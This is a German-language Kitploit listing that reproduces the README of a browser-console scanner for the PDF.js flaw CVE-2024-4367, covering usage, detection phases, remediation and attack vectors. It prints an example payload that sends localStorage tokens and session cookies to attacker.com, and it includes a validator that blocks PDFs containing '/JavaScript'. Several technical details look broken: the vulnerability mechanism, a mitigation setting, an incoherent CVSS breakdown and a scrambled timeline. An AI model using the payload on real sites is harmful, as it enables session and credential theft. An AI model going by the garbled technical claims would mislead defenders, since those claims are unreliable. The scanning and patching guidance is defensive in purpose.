Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pdf.js-CVE-2024-4367 — SCAN ENDE POC CVE-2024-4367 | Kitploit
Tools/GitHubGitHub/veronimo669/pdf.js-cve-2024-4367
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsPapers & ForschungLernen & Bildung
GitHubveronimo669/pdf.js-cve-2024-4367

pdf.js-CVE-2024-4367

SCAN ENDE POC CVE-2024-4367

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2024-4367 - Universeller PDF.js-Schwachstellenscanner

⚠️ KRITISCHES SICHERHEITSTOOL | Erkennt CVE-2024-4367 (CVSS 9.8) - Sicherheitslücke zur Remote-Codeausführung in PDF.js

Version CVSS CVE License

Funktioniert auf JEDER Website - Keine Konfiguration erforderlich


📋 Inhaltsverzeichnis

  • 📖 Übersicht
  • ⚡ Schnellstart
  • 🔍 Was es erkennt
  • 🛠️ So funktioniert es
  • 📊 Ausgabebeispiele
  • 🔒 Leitfaden zur Behebung
  • 🎯 Angriffsvektoren
  • 🧪 Testanleitung
  • 📝 Technische Details
  • ⚠️ Rechtlicher Haftungsausschluss
  • 📚 Referenzen

📖 Übersicht

CVE-2024-4367 ist eine kritische Schwachstelle in PDF.js (Versionen < 4.2.67), die über manipulierte PDF-Dateien die Ausführung beliebigen JavaScript-Codes ermöglicht. Dieser Scanner erkennt automatisch anfällige PDF.js-Instanzen auf JEDER Website.

Warum sich dieser Scanner unterscheidet

  • ✅ Keine Konfiguration - Funktioniert sofort auf jeder Website
  • ✅ Universelle Erkennung - Scannt alle JavaScript-Bundles
  • ✅ Keine Abhängigkeiten - Reines JavaScript
  • ✅ Proof of Concept - Erzeugt eine Test-PDF
  • ✅ Umsetzbare Ergebnisse - Klare Schritte zur Behebung

Die Schwachstelle

PDF.js weist einen Fehler auf, bei dem in PDF-Dateien eingebettetes JavaScript ohne ordnungsgemäßes Sandboxing ausgeführt wird. Angreifer können dadurch:

  • 🏴‍☠️ Authentifizierungstokens stehlen aus localStorage/sessionStorage
  • 🍪 Sitzungscookies exfiltrieren
  • 📁 Auf lokale Dateien zugreifen (bei Electron-/Desktop-Apps)
  • 🔐 Aktionen im Namen des Opfers ausführen mithilfe gestohlener Anmeldedaten
  • 🌐 Über XSS in interne Netzwerke vordringen

⚡ Schnellstart

Methode 1: Browserkonsole (am einfachsten)

  1. Öffne die Zielwebsite
  2. Drücke F12, um die DevTools zu öffnen
  3. Gehe zum Tab Konsole
  4. Füge das gesamte Scanner-Skript ein
  5. Drücke Enter
  6. Betrachte die visuellen Ergebnisse auf dem Bildschirm!

Methode 2: Bookmarklet

Erstelle ein Lesezeichen mit dieser URL:

root@kitploit:~
javascript:(function(){const s=document.createElement('script');s.src='https://cdn.jsdelivr.net/gh/yourusername/CVE-2024-4367-Scanner/scanner.js';document.body.appendChild(s);})();

Methode 3: Direkter Download

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Open any website and run the script

🔍 Was es erkennt

Phase 1: Scan von JavaScript-Bundles

  • ✅ Erkennung der PDF.js-Version
  • ✅ Identifizierung anfälliger Versionen (< 4.2.67)
  • ✅ Package.json-Referenzen
  • ✅ Node_modules-Pfade

Phase 2: Identifizierung von PDF-Viewern

  • ✅ ``-PDF-Viewer
  • ✅ <embed>-Elemente
  • ✅ <object>-Datentags
  • ✅ Benutzerdefinierte PDF-Viewer-Container
  • ✅ Canvas-basierte Renderer

Phase 3: Angriffsvektoren

  • ✅ URL-Parameter (?pdf=, ?file=, ?src=)
  • ✅ PDF-Upload-Formulare
  • ✅ Dateieingabefelder, die .pdf akzeptieren
  • ✅ API-Endpunkte mit PDF-Pfaden

Phase 4: Visuelle Indikatoren

  • ✅ Live-Status der Schwachstelle
  • ✅ Herunterladbare Proof-of-Concept-PDF
  • ✅ Echtzeit-DOM-Overlay

🛠️ So funktioniert es

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│                    SCAN PROCESS FLOW                        │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 📚 LOAD SCRIPTS                                         │
│     ├─ External scripts (all <script src="">)              │
│     └─ Inline scripts (all <script> tags)                  │
│                                                             │
│  2. 🔍 EXTRACT PDF.JS VERSION                               │
│     ├─ Pattern matching in code                             │
│     ├─ Package.json detection                               │
│     └─ Node_modules path parsing                            │
│                                                             │
│  3. 🎯 IDENTIFY VULNERABILITY                               │
│     ├─ version < 4.2.67 ? → VULNERABLE                     │
│     └─ version = 2.16.105 ? → VULNERABLE                   │
│                                                             │
│  4. 🖼️ LOCATE VIEWERS                                       │
│     ├─ DOM element scanning                                 │
│     └─ Attribute detection                                 │
│                                                             │
│  5. ⚡ GENERATE POC                                         │
│     ├─ Create test PDF                                      │
│     └─ Provide download link                                │
│                                                             │
│  6. 📊 DISPLAY RESULTS                                      │
│     ├─ Visual overlay                                       │
│     ├─ Console report                                       │
│     └─ Global variable storage                              │
│                                                             │
└─────────────────────────────────────────────────────────────┘

📊 Ausgabebeispiele

Konsolenausgabe

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════════════════════╗
║                    CVE-2024-4367 - UNIVERSAL PDF.js SCANNER                         ║
║              Detects vulnerable PDF.js versions and potential exploitation         ║
╚═══════════════════════════════════════════════════════════════════════════════════╝

📚 PHASE 1: Scanning JavaScript Bundles for PDF.js
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] Found 42 external scripts
[+] Found 12 inline scripts
   [1/42] Analyzing: vendor.bundle.js
      → PDF.js indicator found: pdfjs-dist
      ✅ PDF.js version found: 2.16.105
      🚨 VULNERABLE to CVE-2024-4367!

🎯 PHASE 4: Identifying Exploitation Vectors
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⚠️ URL parameter accepts PDF: file=/documents/report.pdf
   ⚠️ PDF upload form found

█████████████████████████████████████████████████████████████████████████████████
                          FINAL SCAN REPORT
█████████████████████████████████████████████████████████████████████████████████

🚨 CRITICAL VULNERABILITY CONFIRMED!
   CVE: CVE-2024-4367
   CVSS: 9.8 (CRITICAL)
   Impact: Arbitrary JavaScript Execution

Visuelles Overlay

Scanner-Overlay

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  CVE-2024-4367 SCAN RESULTS                                │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  📍 Target: example.com                                    │
│  📦 PDF.js: 2.16.105                                       │
│  🎯 Vulnerable: YES                                        │
│  📄 Viewers: 3                                             │
│  ⚡ Vectors: 2                                             │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  🔴 CRITICAL - Upgrade Required                            │
└─────────────────────────────────────────────────────────────┘

🔒 Leitfaden zur Behebung

Sofortmaßnahmen

1. PDF.js aktualisieren (empfohlen)

root@kitploit:~
# For Node.js projects
npm install pdfjs-dist@latest

# For CDN usage
# Update to version 4.2.67 or higher

2. JavaScript-Ausführung deaktivieren

root@kitploit:~
// Set this before loading PDF.js
pdfjsLib.GlobalWorkerOptions.disableJavaScript = true;

3. Content Security Policy

root@kitploit:~
Content-Security-Policy: script-src 'self'; 
                        object-src 'none'; 
                        worker-src 'none'

4. Eingabevalidierung

root@kitploit:~
// Validate PDF files before rendering
function validatePDF(file) {
    // Check magic bytes
    const header = file.slice(0, 5);
    if (header !== '%PDF-') {
        throw new Error('Invalid PDF file');
    }
    
    // Scan for JavaScript
    const text = file.toString();
    if (text.includes('/JavaScript') || 
        text.includes('/JS') ||
        text.includes('<< /S /JavaScript >>')) {
        throw new Error('PDF contains JavaScript');
    }
}

Langfristige Lösungen


🎯 Angriffsvektoren

Häufig erkannte Vektoren

  1. URL-Parameter

    root@kitploit:~
    /viewer?file=malicious.pdf
    /download?pdf=malicious.pdf
    
  2. Datei-Uploads

    root@kitploit:~
    <input type="file" accept=".pdf">
    
  3. Eingebettete Viewer

    root@kitploit:~
    
    <embed src="malicious.pdf">
    
  4. API-Endpunkte

    root@kitploit:~
    /api/documents/123/download
    /api/report/pdf
    

Beispiel für eine schädliche Nutzlast

root@kitploit:~
// PDF embedded JavaScript
this.alert('CVE-2024-4367 Exploited!');
fetch('https://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({
        token: localStorage.getItem('token'),
        cookies: document.cookie
    })
});

🧪 Testanleitung

Schritt-für-Schritt-Test

  1. Scanner installieren

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-4367-Scanner
    
  2. Scanner ausführen

    root@kitploit:~
    # Open the target website
    # Paste the scanner in console
    # Or use the bookmarklet
    
  3. Ergebnisse analysieren

    • Achte auf den Status „VULNERABLE" (ANFÄLLIG)
    • Notiere die PDF.js-Version
    • Prüfe die Angriffsvektoren
  4. POC-PDF herunterladen (falls anfällig)

    • Klicke auf die Download-Schaltfläche
    • Lade die PDF hoch bzw. öffne sie
    • Beobachte die JavaScript-Ausführung
  5. Fixes anwenden

    • Aktualisiere PDF.js
    • Implementiere CSP
    • Validiere Eingaben

Erwartete Ergebnisse

SzenarioErgebnis
PDF.js 2.16.105🔴 KRITISCH
PDF.js 3.x🔴 ANFÄLLIG
PDF.js 4.0.x🔴 ANFÄLLIG
PDF.js 4.2.67+

📝 Technische Details

Versionsprüfung

root@kitploit:~
// Vulnerable versions
const VULNERABLE_VERSIONS = [
    { version: '2.16.105', status: 'CRITICAL' },
    { version: '3.x.x', status: 'CRITICAL' },
    { version: '4.0.x - 4.2.66', status: 'CRITICAL' }
];

// Safe version
const SAFE_VERSION = '4.2.67';

Zeitleiste der Schwachstelle

DatumEreignis
2024-04-23Schwachstelle entdeckt
2024-04-24CVE-2024-4367 zugewiesen
2024-04-25

CVSS-Score-Aufschlüsselung


⚠️ Rechtlicher Haftungsausschluss

WICHTIG: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.

  • ✅ Verwende es auf deinen eigenen Websites
  • ✅ Verwende es nur mit ausdrücklicher Genehmigung
  • ✅ Verwende es für Sicherheitsforschung
  • ❌ Verwende es nicht auf nicht autorisierten Systemen
  • ❌ Verwende es nicht für böswillige Zwecke

Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


📚 Referenzen

Offizielle Ressourcen

  • CVE-2024-4367 - NIST NVD
  • PDF.js-Sicherheitshinweis
  • Mozilla-Sicherheitsblog

Verwandte Schwachstellen

  • CVE-2024-4367 - PDF.js RCE
  • CVE-2023-xxxx - Frühere PDF.js-Probleme
  • XSS über PDF.js in Webanwendungen

Tools & Ressourcen

  • Offizielles PDF.js-Repository
  • OWASP XSS Prevention
  • CSP-Referenz

Forschungsarbeiten

  • Sicherheitsanalyse von PDF.js
  • Risiken des clientseitigen PDF-Renderings

🤝 Mitwirken

Beiträge sind willkommen! Bitte:

  1. Forke das Repository
  2. Erstelle einen Feature-Branch
  3. Reiche einen Pull-Request ein
  4. Folge dem Codestil

Entwicklungs-Setup

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Make your changes
# Test on multiple websites
# Submit PR

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die Datei LICENSE für Details.


🌟 Unterstützung

Wenn du dieses Tool nützlich findest:

  • ⭐ Markiere das Repository mit einem Stern
  • 🐛 Melde Probleme
  • 📝 Schreibe Dokumentation
  • 🔧 Reiche Fixes ein

🛡️ Bleib sicher. Teste früh. Teste oft.

Mit ❤️ von der Sicherheits-Community erstellt

Problem melden • Auf GitHub mit Stern markieren • Dokumentation lesen

Tool herunterladen
LösungSchwierigkeitWirksamkeit
PDF.js aktualisierenEinfach✅ Vollständige Behebung
JS in PDF.js deaktivierenEinfach✅ Vollständige Behebung
CSP-ImplementierungMittel✅ Gut
Serverseitige ValidierungMittel✅ Gut
Sandbox-RenderingSchwer✅ Hervorragend
✅ SICHER
Kein PDF.jsℹ️ SICHER
Patch veröffentlicht (4.2.67)
2024-04-26Öffentliche Offenlegung
2024-05-01Exploit-Versuche beobachtet
KomponenteScore
AngriffsvektorNetzwerk (9.8)
AngriffskomplexitätNiedrig (9.8)
Erforderliche PrivilegienKeine (9.8)
BenutzerinteraktionErforderlich (8.8)
AuswirkungsbereichGeändert (9.1)
VertraulichkeitHoch (9.8)
IntegritätHoch (9.8)
VerfügbarkeitHoch (9.8)
Gesamt9.8 (KRITISCH)